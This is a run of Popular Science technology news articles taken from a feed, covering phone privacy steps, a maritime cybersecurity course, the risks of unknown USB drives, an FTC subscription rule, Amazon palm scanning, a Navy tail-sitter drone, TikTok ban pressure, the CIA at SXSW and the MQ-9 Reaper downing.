Android and iOS don’t allow apps to hide, so even if someone has gained access to your handset to install an app that’s keeping tabs on you, you’ll be able to see it. On Android, go to Settings, Apps, and then See all apps. If you see something you don’t recognize, tap the item on the list and choose Uninstall. Within iOS, just check the main apps list in Settings. As the device’s owner, you can uninstall anything you don’t recognize or trust—you won’t break your phone by removing apps, so don’t hesitate if there’s something you’re unsure about.

If you want to do a bit more detective work, you can check the permissions of any suspicious apps. These will show up when you tap through on the apps list from the screens just mentioned—on Android, tap on an app and go to Permissions; on iOS tap an app name from the main Settings page and check what it’s allowed to access. In terms of notifications, system settings, device monitoring, and other special permissions, Android gives apps slightly more leeway than iOS—you can check up on these by going to Settings and choosing Apps and Special app access.

If you think your phone might have been compromised in some way, make sure you back up all of your data and perform a full reset. This should remove shady apps, block unauthorized access, and put you back in control. From Android’s settings page, choose System, Reset options, and Erase all data (factory reset). On iOS, open Settings, then pick General, Transfer or Reset iPhone, and Reset.

Watch what you’re sharing

Apple and Google make it easy for you to share your location, photos, and calendars with other people. But this sort of sharing might have been enabled without your knowledge, or you may have switched it on in the past and now want to deactivate it.

If you’re on an iPhone, open the Settings app, tap your Apple ID or name at the top of the screen, open Find My, and see who can view your location at all times. You can revoke access for everyone by turning off the toggle switch next to Share My Location or remove individuals by touching their name followed by Stop Sharing My Location. You can audit shared photo albums from the Shared Albums section of the Albums tab in Photos, and shared calendars from the Calendars screen in the Calendar app. If you’re in a Family Sharing group that you no longer want to be a part of, open Settings, tap your Apple ID or name, and choose Leave Family.

[Related: How to securely store and share sensitive files]

Android handles location sharing with other people through Google Maps. Tap your avatar (top right), then Location sharing to check who can see your location and to stop them, if necessary. You can check your shared photo albums in Google Photos by tapping the Sharing tab at the bottom of the screen, but you’ll need to open up Google Calendar on the web to edit shared calendars. Hover over the name of a calendar on the left sidebar and click the three dots that appear, and on the emerging menu, select Settings and sharing to see who can view your schedule.

Google Families works in a similar way to Apple Family Sharing, with certain notes and calendars marked as accessible by everyone, though no one will be able to see any personal files unless the owner specifically shares them. If you want to leave a family group, open the Play Store app on Android, and tap your avatar (top left). Once you’re there, go to Settings, Family, and Manage family members. Then, in the top right, tap the three dots and Leave family group.

Protect your accounts

With so much of our digital lives now stored in the cloud, hacking these services is arguably an easier route into your data than physically accessing your phone. If your Apple or Google account gets compromised, your emails, photos, notes, calendars, and messages could all be vulnerable, and you wouldn’t necessarily know it.

The usual password rules apply: Don’t repeat credentials across multiple accounts and make sure they’re easy for you to remember while remaining impossible for anyone else to guess. This includes even those closest to you, so avoid names, birthdays, and pet names.

Two-step authentication (2FA) is available on most digital accounts, so switch it on wherever you can. For Apple accounts, visit this page and click Account Security; for Google accounts, click your avatar on any of the company’s services, go to Manage account, Security, and click on 2-Step Verification.

It’s a good idea to regularly check how many devices are logging in using your Google or Apple account credentials as well. On Android, open Settings and pick Google, Manage your Google account, and Security. Scroll down and under Your devices you’ll see a list of all the gadgets linked to your Google account. You can remove any of them by tapping on their name, followed by Sign out. On an iPhone, open Settings and tap your name at the top to see devices linked to your account—you can tap on one and then choose Remove from Account to revoke its access to your Apple account.

As long as you have 2FA set up, any unwelcome visitor should be blocked from signing straight back into your account, even if they know your password. But to be safe, if you discover some sort of unauthorized access, we’d still recommend changing your password. It’s also a good idea to do this regularly to make sure that only your devices have access to your data.

This story has been updated. It was originally published on January 21, 2021.

The post Your checklist for maximum smartphone security appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Maritime students gear up to fight high-seas cyberattacks https://www.popsci.com/technology/maritime-cybersecurity-college-class/ Sat, 25 Mar 2023 11:00:00 +0000 https://www.popsci.com/?p=522856
Container cargo ship at sea
Maritime cybersecurity is vital for global trade, but until now, there were no dedicated training programs. Deposit Photos

A Norwegian university is tackling the lack of boat cybersecurity with a new college class.

The post Maritime students gear up to fight high-seas cyberattacks appeared first on Popular Science.

]]>
Container cargo ship at sea
Maritime cybersecurity is vital for global trade, but until now, there were no dedicated training programs. Deposit Photos

The word “pirate” may conjure up the image of humans physically taking over a vessel, but what if instead a ship was simply hacked from afar? That’s a question on the mind of Norwegian researchers, who point out that unfortunately, the international shipping world isn’t exactly known for its quick adoption of cutting-edge tech.

“The maritime industry has a history of being quite reactive and slow, so it is no surprise that we are lacking behind in the matter of cybersecurity as well,” says Marie Haugli-Sandvik.

Haugli-Sandvik, who works within the Department of Ocean Operations and Civil Engineering at Norwegian University of Science and Technology (NTNU), explains via email to PopSci that this incremental pace is what led her and fellow PhD candidate, Erlend Erstad, to create what is likely the world’s first “maritime digital security” course. According to a report this week from NTNU, the course’s students recently spent two months examining and assessing current oceanic digital threats, then practiced handling a ship cyberattack scenario focusing on risk management and resilience building.

“We see that shipping companies are investing in technological solutions for increased automation and monitoring, which exposes vessels to cyber risks in new ways,” writes Haugli-Sandvik, noting the dramatic increase in maritime cyberattacks over the last few years, particularly in the wake of the COVID-19 pandemic. “These cyber threats can both bankrupt companies and affect the safety at sea,” she says.

[Related: ​The ship blocking the Suez is finally unstuck, but we could see bottlenecks like this again]

NTNU estimates 90 percent of all world trade is linked in some way to maritime travel, leaving a massive avenue for cyberthreats to disrupt global commerce, data, and safety. Unfortunately, many cybersecurity courses only focus on more generic IT threats, which is what spurred Haugli-Sandvik and Erstad to create the class.

Haugli-Sandvik says there is positive movement within the community—such as mandatory cybersecurity requirements coming from the maritime industry regulators at International Association of Classification Societies (IACS) in 2024, alongside increased cybersecurity training for maritime personnel—but there remains a sizable lack of targeted training pertaining to sea environments. 

The course instructors hope their students learn just how vulnerable to cyberthreats vessel systems can be, and that they come away with actionable operative training to handle issues. “Seafarers need to enhance their cyber security awareness and skills so that they can protect themselves, the ship, the environment, and their companies,” writes Haugli-Sandvik, adding, “The human element in cyber security is vital to address since there is no longer a question about if you get hit by a cyber-attack, it is a question about when it will happen.”

The post Maritime students gear up to fight high-seas cyberattacks appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Don’t plug in mysterious USB drives https://www.popsci.com/technology/usb-based-attacks/ Thu, 23 Mar 2023 21:00:00 +0000 https://www.popsci.com/?p=522447
a person plugs in a usb drive
Only do this with devices you trust. Deposit Photos

From malware to more extreme scenarios, there are very important reasons to be wary of an unknown USB device.

The post Don’t plug in mysterious USB drives appeared first on Popular Science.

]]>
a person plugs in a usb drive
Only do this with devices you trust. Deposit Photos

An Ecuadorian journalist has been injured by a bomb hidden inside a USB drive, according to AFP. Lenin Artieda, a television journalist, received an envelope containing what “looked like a USB drive,” the BBC reported. When he loaded it into his computer, it exploded. Fortunately, Artieda only sustained “slight injuries,” AFP reports, and no one else was hurt in the targeting campaign, which included “at least five journalists.” 

While this is an incredibly extreme example, it is an important reminder to never insert strange USB devices—and especially USB pen or thumb drives—into your computer. The most commonplace threat they pose is that they could come packed with malware. It’s called a USB attack, and they rely on the victim willingly inserting a USB device into their computer. In some cases, they’re being Good Samaritans and trying to return a USB drive to someone who’s lost it. In others, they’re lied to and told the USB drive has a list of things they can spend a gift card on, or even confidential or important information. 

However it happens, once the target inserts the USB device, the hackers and other bad actors have gotten what they want. USB devices provide them with multiple ways to ruin your day. In fact, researchers at Ben-Gurion University of the Negev in Israel identified four broad categories of attack

Type A attacks are where one USB device, like a thumb drive, impersonates another, like a keyboard. When you plug it in, the keyboard automatically sends keystrokes that can install malware, take over your system, and basically do whatever the attacker wants. It’s called a Rubber Ducky attack, which is a pretty cute term for something that can cause a lot of problems. 

Type B1 and B2 attacks are similar. Instead of impersonating a different USB device, the attacker either reprograms the USB drive’s firmware (B1) or exploits a software bug in how the computer’s operating system handles USB devices (B2) to do something malicious. Finally, type C attacks deliver a high-powered electrical charge that can destroy the computer. 

In any case, these attacks aren’t theoretical. Infected USB keys were used to take down Iranian nuclear centrifuges. They’ve also been used to infect US power plants and other infrastructure, like oil refineries. And it’s not just heavy industries that are affected—banks, hospitality providers, transport companies, insurance providers, and defense contractors have all been targeted over the past few years with USB drives sent through the mail.

While email is still the most common method of malware delivery and most attacks target large companies, small businesses and individual users should still be careful. Ransomware in particular is a very real threat at the moment.

So what do you do if you find a USB key abandoned on the ground? Well, your best bet is to pop it in the nearest trash can—or better yet, send it to an e-waste recycling center. Whatever you do, don’t plug it into your computer. 

If you receive a USB key in the mail, you should do much the same—unless you are expecting one from someone you trust. 

Even the free USB keys that companies give out at conferences likely should be treated the same way. It’s too easy for a bad actor to sneak in, pretend to be working for a firm at the show, and hand out loads of malware-infected devices. 

And if you do insist on plugging it in, check out our guide on how to do it as safely as possible. It’s still can be a risky gambit—and it doesn’t mitigate risk from, in what’s certainly a very rare case, an explosive device—but at least the chance of your PC getting infected with malware will be reduced. 

The post Don’t plug in mysterious USB drives appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Canceling your digital subscriptions could finally get easier https://www.popsci.com/technology/ftc-subscription-cancellation/ Thu, 23 Mar 2023 17:00:00 +0000 https://www.popsci.com/?p=522310
Close-up of Federal Trade Commission building exterior
The FTC wants to put an end to subscription cancellation red-tape. Deposit Photos

The FTC wants to force companies to vastly simplify their membership and subscription cancellation steps.

The post Canceling your digital subscriptions could finally get easier appeared first on Popular Science.

]]>
Close-up of Federal Trade Commission building exterior
The FTC wants to put an end to subscription cancellation red-tape. Deposit Photos

How much money have you lost from forgetting to cancel an online subscription following its free trial? Or from getting frustrated while trying to figure out how exactly to end a recurring charge, pledging to do it later, and then subsequently not getting around to it? Don’t feel bad—the Federal Trade Commission sympathizes. And they are trying to do something to ease the pain.

On Thursday, the FTC announced a new “click to cancel” rule provision proposal to simplify the process of ending subscriptions and memberships for consumers. The potential reforms come as regulators are reexamining their 1973 Negative Option Rule, which is often utilized by the agency to push back against companies’ often deliberate tactics to obfuscate the ways in which customers can voluntarily end subscriptions.

[Related: The FTC is trying to get more tech-savvy.]

“Some businesses too often trick consumers into paying for subscriptions they no longer want or didn’t sign up for in the first place,” said FTC Chair Lina M. Khan in the official statement, adding that the new proposal will save consumers money and time while enabling regulators the ability to issue penalties to businesses for “subscription tricks and traps.”

Arguing the “current patchwork of laws and regulations available to the FTC do not provide consumers and industry with a consistent legal framework,” regulators are suggesting three major changes:

  • Requiring a simple mechanism making it as easy to cancel a service’s account as it is to sign up for one, and in “the same number of steps.”
  • While still allowing businesses to pitch additional offers or subscription modifications during the cancellation process, those opportunities can only be given after presenting users with a clear means to opt-out of paid memberships.
  • Requiring sellers to offer consumers annual reminders enrolled in “negative option programs involving anything other than physical goods, before they are automatically renewed.”

Additionally, the FTC seeks to require companies offering customers online subscription sign-up options to also explicitly offer online cancellation, as opposed to only doing so through email forms, phone calls, or in-person meetings.

[Related: Why the new FTC chair is causing such a stir.]

As helpful as these changes will be for consumers, unfortunately, there is no current estimated timeline on when the reforms could go into effect. Multiple additional steps are needed, including a public comment period, before the FTC begins writing a final rule proposal. In the meantime, now is as good a time as ever to start reviewing what subscriptions—such as streaming services—are still charging to your bank accounts.

The post Canceling your digital subscriptions could finally get easier appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Soup with a side of biometrics: Amazon One is coming to Panera https://www.popsci.com/technology/panera-amazon-palm-scanner/ Wed, 22 Mar 2023 20:00:00 +0000 https://www.popsci.com/?p=522072
Panera Bread restaurant exterior at twilight
Amazon One integration is beginning at locations in St. Louis. Deposit Photos

Amazon was hit with a lawsuit regarding its use of the palm-scanning biometric tools just last week.

The post Soup with a side of biometrics: Amazon One is coming to Panera appeared first on Popular Science.

]]>
Panera Bread restaurant exterior at twilight
Amazon One integration is beginning at locations in St. Louis. Deposit Photos

Panera announced a new partnership with Amazon to integrate the tech company’s Amazon One biometric palm scanning services into the fast casual restaurant’s loyalty rewards program. But less than a week ago, the bakery-cafe chain’s newest collaborator was hit with potential litigation regarding alleged digital privacy violations in its NYC brick-and-mortar Amazon Go stores.

After linking one’s MyPanera account to Amazon’s contactless, palm-scanning Amazon One software, customers reportedly will be able to pay for meals, receive menu recommendations based on preferences, and earn rewards points without any physical card requirements. While currently limited to a handful of locations in St. Louis, the popular bakery-cafe chain intends to expand the feature to additional US locations in the coming months.

Palm scanners were first utilized within Amazon Go stores following a public launch in 2018. The workerless convenience shops faced immediate scrutiny from critics for its perceived overreliance on invasive data tech, as well as its impact on human labor forces. In 2021, New York City passed a law requiring businesses that collect, store, or share “biometric identifiers” to alert customers to this fact via signs posted near store entrances. Earlier this month, however, the New York Times revealed many stores still failed to abide by this obligation, allegedly including at least one Amazon Go location. The lawsuit alleges that Amazon only began posting signage following the NYT’s report.

Filed last Thursday in US District Court for the Southern District of New York, the lawsuit claims Amazon Go amasses customers’ biometric data via Amazon One palm scanners alongside computer vision, deep learning algorithms, and sensor fusion to “measure the shape and size of each customer’s body to identify customers, track where they move in the stores, and determine what they have purchased.”

[Related: ChatGPT is quietly co-authoring books on Amazon.]

“We all have our own favorite bread recipes, but none of them use biometric data as an ingredient,” Albert Fox Cahn, executive director of the Surveillance Technology Oversight Project (STOP) and an attorney for the proposed lawsuit said via email when asked about the timing of Amazon’s Panera partnership. Cahn believes it’s “absurd” Panera would utilize the palm scanners so soon after Amazon may fight litigation over the tech’s uses.

“I don’t understand why the company isn’t taking customer’s privacy and safety more seriously,” he added.

In an email to PopSci, a Panera spokesperson stressed that the company’s partnership is with Amazon One specifically, and not Amazon Go. “Amazon One is the entirely opt-in, palm-scanning device,” they clarified. They declined to comment on the lawsuit regarding Amazon’s data policies within its Amazon Go locations.

The post Soup with a side of biometrics: Amazon One is coming to Panera appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Watch this Navy drone take off and land on its tail like a rocket https://www.popsci.com/technology/tail-sitter-drone-aerovel-flexrotor/ Tue, 21 Mar 2023 22:00:00 +0000 https://www.popsci.com/?p=521729
An Aerovel Flexrotor drone takes off from the guided-missile destroyer USS Paul Hamilton in the Arabian Gulf on March 8, 2023.
An Aerovel Flexrotor drone takes off from the guided-missile destroyer USS Paul Hamilton in the Arabian Gulf on March 8, 2023. Elliot Schaudt / US Navy

Drones like these are called tail-sitters, and they have distinct advantages.

The post Watch this Navy drone take off and land on its tail like a rocket appeared first on Popular Science.

]]>
An Aerovel Flexrotor drone takes off from the guided-missile destroyer USS Paul Hamilton in the Arabian Gulf on March 8, 2023.
An Aerovel Flexrotor drone takes off from the guided-missile destroyer USS Paul Hamilton in the Arabian Gulf on March 8, 2023. Elliot Schaudt / US Navy

On March 8, in the ocean between Iran and the Arabian Peninsula, the US Navy tested out a new drone. Called the Aerovel Flexrotor, it rests on a splayed tail, and boasts a powerful rotor just below the neck of its bulbous front-facing camera pod. The tail-sitting drone needs very little deck space for takeoff or landing, and once in the sky, it pivots and flies like a typical fixed-wing plane. It joins a growing arsenal of tools that are especially useful in the confined launch zones of smaller ship decks or unimproved runways.

The March flights took place as part of the International Maritime Exercise 2023, billed as a multinational undertaking involving 7,000 people from across 50 nations. Activities in the exercise include working on following orders together, maritime patrol, countering naval mines, testing the integration of drones and artificial intelligence, and work related to global health. It is a hodgepodge of missions, capturing the multitude of tasks that navies can be called upon to perform.

This deployment is at least the second time the Flexrotor has been brought to the Persian Gulf by the US Navy. In December 2022, a Coast Guard ship operating as part of a Naval task force in the region launched a Flexrotor. This flight was part of an event called Digital Horizon, aimed at integrating drones and AI into Navy operations, and it included 10 systems not yet used in the region.

“The Flexrotor can support intelligence, surveillance and reconnaissance (ISR) missions day and night using a daylight or infrared camera to provide a real-time video feed,” read a 2022 release from US Central Command. The release continued: “In addition to providing ISR capability, UAVs like the Flexrotor enable Task Force 59 to enhance a resilient communications network used by unmanned systems to relay video footage, pictures and other data to command centers ashore and at sea.”

Putting drones on ships is hardly new. ScanEagles, a scout-drone used by the US Navy since 2005, can be launched from a rail and landed by net or skyhook. What sets the Flexrotor apart is not that it is a drone on a ship, but the fact that it requires a minimum of infrastructure to make it usable. This is because the drone is a tail-sitter.

What is a tail-sitter?

There are two basic ways to move a heavier-than-air vehicle from the ground to the sky: generate lift from spinning rotors, or generate lift from forward thrust and fixed wings. Helicopters have many advantages, needing only landing pads instead of runways, and they can easily hover in flight. But helicopters’ aerodynamics limit cruising and maximum speeds, even as advances continue to be made

Fixed wings, in turn, need to build speed and lift off on runways, or find another way to get into the sky. For rail-launched drones like the ScanEagle, this is done with a rail, though other methods have been explored.

Between helicopters and fixed-wing craft sit tiltrotors and jump-jets, where the the thrust (from either rotors/propellers or ducted jets) changes as the plane stays level in flight, allowing vertical landings and short takeoffs. This is part of what DARPA is exploring through the SPRINT program.

Tail-sitters, instead, involve the entire plane pivoting in flight. In effect, they look almost like a rocket upon launch, narrow bodies pointed to pierce the sky, before leveling out in flight and letting the efficiency of lift from fixed wings extend flight time and range. (Remember the space shuttle? It was positioned like a tail-sitter when it blasted off, but landed like an airplane, albeit without engines.) Early tail-sitters suffered because they had to accommodate a human pilot through all those transitions. Modern tail-sitter drones, like the Flexrotor or Australia’s STRIX, instead have human operators guiding the craft remotely from a control station. Another example is Bell’s APT 70.

The advantage to a tail-sitting drone is that it only needs a clearing or open deck space as large as its widest dimension. In the case of the Flexrotor, that means a rotor diameter of 7.2 feet, with at least one part of the launching surface wide enough for the drone’s nearly 10-foot wingspan. By contrast, the Seahawk helicopters used by the US Navy have a rotor diameter of over 53 feet. Ships that can already accommodate helicopters can likely easily add tail-sitter drones, and ships that couldn’t possibly fit a full-sized crewed helicopter might be able to take on and operate a drone scout.

In use, the Flexrotor boasts a cruising speed of 53 mph, a top speed of 87 mph, and potentially more than 30 hours of continuous operation. After takeoff, the Flexrotor pivots to fixed-wing flight, and the splayed tail retracts into a normal tail shape, allowing the craft to operate like a regular fixed-wing plane in the sky. Long endurance drones like these allow crews to pilot them in shifts, reducing pilot fatigue without having to land the drone to switch operators. Aerovel claims that Flexrotors have a range of over 1,265 miles at cruising speeds. In the air, the drone can serve as a scout with daylight and infrared cameras, and it can also work as a communications relay node, especially valuable if fleets are dispersed and other communications are limited.

As the Navy looks to expand what it can see and respond to, adding scouts that can be stowed away and then launched from cleared deck space expands the perception of ships. By improving scouting on the ocean, the drones make the vastness of the sea a little more knowable.

Watch a video below:

The post Watch this Navy drone take off and land on its tail like a rocket appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
US government gives TikTok an ultimatum, warning of ban https://www.popsci.com/technology/tiktok-ultimatum-ban-us-uk/ Thu, 16 Mar 2023 18:00:00 +0000 https://www.popsci.com/?p=520246
Smartphone with TikTok brand logo resting on laptop laptop keyboard
TikTok's parent company, ByteDance, faces increasing pressure from the US and the UK to distance itself from China. Deposit Photos

The Biden administration warned TikTok's owners to sell their stakes, while the UK banned the app from government devices.

The post US government gives TikTok an ultimatum, warning of ban appeared first on Popular Science.

]]>
Smartphone with TikTok brand logo resting on laptop laptop keyboard
TikTok's parent company, ByteDance, faces increasing pressure from the US and the UK to distance itself from China. Deposit Photos

The heat is truly on for short video app TikTok in both the US and abroad following months of political posturing and threats. On Thursday, The Wall Street Journal first reported that the Biden administration has issued an unofficial ultimatum to the popular social media app’s Chinese owners—sell your stock shares, or face a wholesale app ban in the US. Meanwhile, the UK moved forward on Thursday with blacklisting TikTok from all government devices, citing security concerns.

The latest domestic pressures come after a consistent torrent of criticisms from US lawmakers against TikTok’s parent company, ByteDance. Among others, Sens. John Thune (R, SD) and Mark Warner (D, VA) allege that China-based owners ostensibly can’t be trusted with access to their millions of American users’ data. Although it is true both ByteDance’s owners and TikTok itself have been shown to engage in questionable and outright illegal practices in the past, critics of the ban say this is nothing but a deflection from the larger issues at hand—namely, consumers’ overall digital privacy safeguards across the entire spectrum of online life and social media platforms.

[Related: Why some US lawmakers want to ban TikTok.]

“If it weren’t so alarming, it would be hilarious that US policymakers are trying to ‘be tough on China’ by acting exactly like the Chinese government,” recently argued Evan Greer, director of the privacy advocacy group, Fight for the Future, in a statement. Greer also added that, “Banning an entire app used by millions of people, especially young people, LGBTQ folks, and people of color, is classic state-backed Internet censorship.”

Greer and others concede that while TikTok may pose some security risks for users, so does virtually every other major social media platform collecting massive troves of data for targeted advertising, branding, and consumer profiles. Even if TikTok were banned, Greer says, ByteDance could hypothetically still access much of the same data by buying it from data brokers, given that there are few laws in place to protect American consumers from this kind of strategy. Earlier this month, David Greene, civil liberties director of the Electronic Frontier Foundation, told PopSci that American lawmakers “can’t just be responding to undifferentiated fear, or to uninvestigated or unproven concerns, or at the worst, xenophobia.”

[Related: Hackers could be selling your Twitter data for the lowball price of $2.]

Instead, anti-ban advocates continue to urge Congress to pass a universal data protection legislation, much like what the European Union did back in 2018 with the General Data Protection Regulation (GDPR). This regulation, which has affected companies such as Google and Amazon, most recently cost Facebook’s owners at Meta $275 million for a massive data leak in 2021.

Meanwhile, actually enacting such a targeted ban on TikTok could prove difficult to enforce, says Greer. Last month, the American Civil Liberties Union released a letter urging politicians to reconsider their stance on the issue while warning that blacklisting the app could violate First Amendment rights.

The post US government gives TikTok an ultimatum, warning of ban appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Blink’s Smart Doorbell is just $35 on Amazon right now https://www.popsci.com/gear/blink-smart-doorbell-deal/ Thu, 16 Mar 2023 15:09:43 +0000 https://www.popsci.com/?p=520133
Blink Video Doorbell Deal
Blink

Improve your home's smart home security system for an incredibly low price.

The post Blink’s Smart Doorbell is just $35 on Amazon right now appeared first on Popular Science.

]]>
Blink Video Doorbell Deal
Blink

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Starting a smart home security system can seem daunting—and expensive—but that’s not true right now thanks to an unexpected sale on video doorbells and camera from Blink. The company has always focused on budget-priced gear that punches above its weight, but getting an HD security camera for well under $50. This deal isn’t tied to a larger sale, and could end at any time.

Blink’s battery-powered, Amazon Alexa-enabled HD camera is a no-brainer for anyone who want’s to start a smart security system without breaking the bank. It has all the key features found in more expensive options: motion detection, cloud storage (for $3 per month or $30 per year), a two-way audio system, and the option to run it on batteries or existing doorbell wiring. You can avoid paying for cloud storage by using Blink’s Sync Module 2, an accessory that will let you save its video clips locally. The Sync Module isn’t on sale, but Blink is offering a bundle with its Video Doorbell for $26 off.

A big part of the Blink Video Doorbell’s appeal is its integration with Amazon’s hardware ecosystem. If you have an Echo Show, for instance, video from the Video Doorbell will pop up on its screen when someone approaches your home. You’ll immediately be able to tell if someone you know has arrived, a package has been delivered, or a solicitor has come knocking. If you’re not home, a notification on your phone will alert you that someone has arrived, and you can communicate with them using the Blink Video Doorbell’s microphone and speaker system.

It may not be able to record video in 4K, but Blink’s Video Doorbell will keep an eye on the most vulnerable part of your house for a bargain price.

The best Blink security deals

The best tech deals

The post Blink’s Smart Doorbell is just $35 on Amazon right now appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
The CIA hit up SXSW this year—to recruit tech workers https://www.popsci.com/technology/cia-sxsw-presentation/ Wed, 15 Mar 2023 16:00:00 +0000 https://www.popsci.com/?p=519736
Building in Austin, Texas, displaying SXSW logo with people outside
The CIA is apparently mingling at SXSW to try courting potential tech industry partners. Deposit Photos

On Monday, the intelligence agency stopped by the annual tech and culture festival to pitch attendees on spycraft collaborations.

The post The CIA hit up SXSW this year—to recruit tech workers appeared first on Popular Science.

]]>
Building in Austin, Texas, displaying SXSW logo with people outside
The CIA is apparently mingling at SXSW to try courting potential tech industry partners. Deposit Photos

The annual South by Southwest festival is currently in full-swing down in Austin, Texas, showcasing this year’s trendiest films, music, comedy, and cutting-edge tech. Much of what dominates the coming year’s buzzworthy headlines often gets a springtime boost from SXSW coverage, such as last year’s Everything, Everywhere, All at Once, which drew rave reviews at SXSW and went on to win the Academy Award for Best Picture on Sunday. And at least one government department is trying to capitalize on the cultural caché—the Central Intelligence Agency.

On Monday, the CIA hosted a one-hour presentation, entitled “Spies Supercharged,” from a downtown Austin Hilton conference room—an “open call” for those working within areas like quantum computing, biotech, semiconductor research, and wireless communications. The CIA purportedly wants tech’s brightest minds to consider future collaborations with the covert intel agency, according to Bloomberg Business, who also noted around 500 people were in attendance.

[Related: A CIA spy plane crashed outside Area 51 a half-century ago. This explorer found it.]

“In a world of ubiquitous surveillance, artificial intelligence, sophisticated disinformation campaigns, and data streams that double in size every two years, how will intelligence agencies respond to the opportunities and challenges presented by emerging technologies and the ever-changing digital ecosystems we will live within?” reads the event’s official description on SXSW’s panel schedule.

“Supercharged spies are exactly what you want, and what you deserve,” CIA deputy director David Cohen said early in the presentation, reiterating that the agency is deeply concerned about threats posed by AI advancements in surveillance and communications that could potentially compromise agents and assets in the field. “To defeat that ubiquitous technology, if you have any good ideas, we’d be happy to hear about them afterwards,” Cohen added.

Although it’s currently unclear if any deals were struck immediately following the “Spies Supercharged” pitch meeting, the CIA has a number of job openings posted to its website, including Telecommunications Services Officer, Digital Forensics Engineer, and Cyber Security Researcher.

Calling the tech sector “one of the great engines” of the US economy, Cohen argued that an increasing amount of resources would need to be dedicated to ensuring economic stability in the face of meddling from foreign adversaries.

[Related: The CIA’s bold kidnapping of a Soviet spacecraft.]

The presentation comes at a tricky time for tech—last week, the dramatic collapse of Silicon Valley Bank, previously the primary financial institution for tech culture’s venture capitalist backers and startups, sent shockwaves through the economy. SVB was essentially rendered insolvent after depositors attempted to withdraw $42 billion following market indications of bank turmoil, and critics have since argued such chaos doesn’t exactly speak to Silicon Valley leaders’ business acumen or long-term strategy.

SXSW is set to conclude the fun on March 19, following upcoming events like Apple Original Films Presents: The Tetris Experience and the Mike’s Hard Lemonade Lounge.

The post The CIA hit up SXSW this year—to recruit tech workers appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
What to know about the MQ-9 Reaper, the drone the US just lost over the Black Sea https://www.popsci.com/technology/mq-9-reaper-drone-russia-crash/ Tue, 14 Mar 2023 21:30:00 +0000 https://www.popsci.com/?p=519569
MQ-9 Reaper in flight
An MQ-9 Reaper over the Nevada Test and Training Range on July 15, 2019. The UAVs have a wingspan of 66 feet. William Rio Rosado / US Air Force

It was "intercepted and hit by a Russian aircraft," according to an Air Force general. These are the basics of the incident—and the Reaper.

The post What to know about the MQ-9 Reaper, the drone the US just lost over the Black Sea appeared first on Popular Science.

]]>
MQ-9 Reaper in flight
An MQ-9 Reaper over the Nevada Test and Training Range on July 15, 2019. The UAVs have a wingspan of 66 feet. William Rio Rosado / US Air Force

This post has been updated on March 16 to include video of the incident released by the US Department of Defense. The story was originally published on March 14, 2022.

At 7:03 am Central European Time on March 14, one of a pair of Russian Su-27 fighter jets flying over the Black Sea struck the propeller of an MQ-9 reaper drone piloted by the United States. According to US European Command, the strike against the propeller required the drone’s remote pilots to bring it down into international water. It is hardly the first takedown of a Reaper drone, nor is it even the first time Russian forces have caused the destruction of such a plane, but any confrontation between military aircraft of the world’s two foremost nuclear-armed states can understandably feel tense.

Since 2021, the United States has based MQ-9 Reaper drones in Romania, a NATO ally that borders both Ukraine and the Black Sea. These Reapers, as well as Reapers flown from elsewhere, were part of the overall aerial surveillance mission undertaken by the United States and NATO on the eve of Russia’s February 2022 invasion of Ukraine.

What happened over the Black Sea?

The basics of the incident are as follows: “Our MQ-9 aircraft was conducting routine operations in international airspace when it was intercepted and hit by a Russian aircraft, resulting in a crash and complete loss of the MQ-9,” said US Air Force general James B. Hecker, commander of US Air Forces Europe and Air Forces Africa, in a statement about the incident published by US European Command. “In fact, this unsafe and unprofessional act by the Russians nearly caused both aircraft to crash. US and Allied aircraft will continue to operate in international airspace and we call on the Russians to conduct themselves professionally and safely.” (Watch video of the incident here.)

This is language that emphasizes the incident as a mistake or malfeasance by the two Russian Su-27 pilots. It is not, notably, a demand that the loss of a Reaper be met with more direct confrontation between the United States and Russia, even as the US backs Ukraine with supplies and, often, intelligence as it fights against the continued Russia invasion. In the years prior to Russia’s full invasion of Ukraine, Russian jets have harassed US aircraft over the Black Sea. It is a common enough occurrence that the think tank RAND has even published a study on what kind of signals Russia intends to send when it intercepts aircraft near but not in Russian airspace.

“Several times before the collision,” according to European Command, “the Su-27s dumped fuel on and flew in front of the MQ-9 in a reckless, environmentally unsound and unprofessional manner.”

Russia’s Ministry of Defence also released a statement on the incident, claiming that the Reaper was flying without a transponder turned on, that the Reaper was headed for Russian borders, and that the plane crashed of its own accord, without any contact with Russian jets.

In a press briefing the afternoon of March 14, Pentagon Press Secretary Pat Ryder noted that the Russian pilots were flying near the drone for 30 to 40 minutes before the collision that damaged the Reaper. Asked if the drone was near Crimea, a peninsula on the Black Sea that was part of Ukraine until Russia occupied it in 2014, Ryder said only that the flight was in international waters and well clear of any territory of Ukraine. Ryder also did not clarify when asked about whether or not the Reaper was armed, saying instead that it was conducting an ISR (intelligence, surveillance, and reconnaissance) mission.

The New York Times reported that the drone was not armed, citing a military official.

What is an MQ-9 Reaper?

The Reaper is an uncrewed aerial vehicle, propelled by a pusher prop. It is made by General Atomics, and is an evolution of the Predator drone, which started as an unarmed scout before being adapted into a lightly armed bomber. The Reaper entered operational service in October 2007, and it was designed from the start to carry weapons. It can wield nearly 4,000 pounds of explosives, like laser guided bombs, or up to eight Hellfire missiles.

They measure 36 feet from tip to tail and have a wingspan of 66 feet, and in 2020 cost about $18 million apiece. 

To guide remote pilots for takeoff and landing, Reapers have a forward-facing camera, mounted at the front of their match-shaped airframes. To perceive the world below, and offer useful real-time video and imaging, a sensor pod complete with laser target designator, infrared camera, and electro-optical cameras pivots underneath the front of the drone, operated by a second crew member on the ground: the sensor operator. 

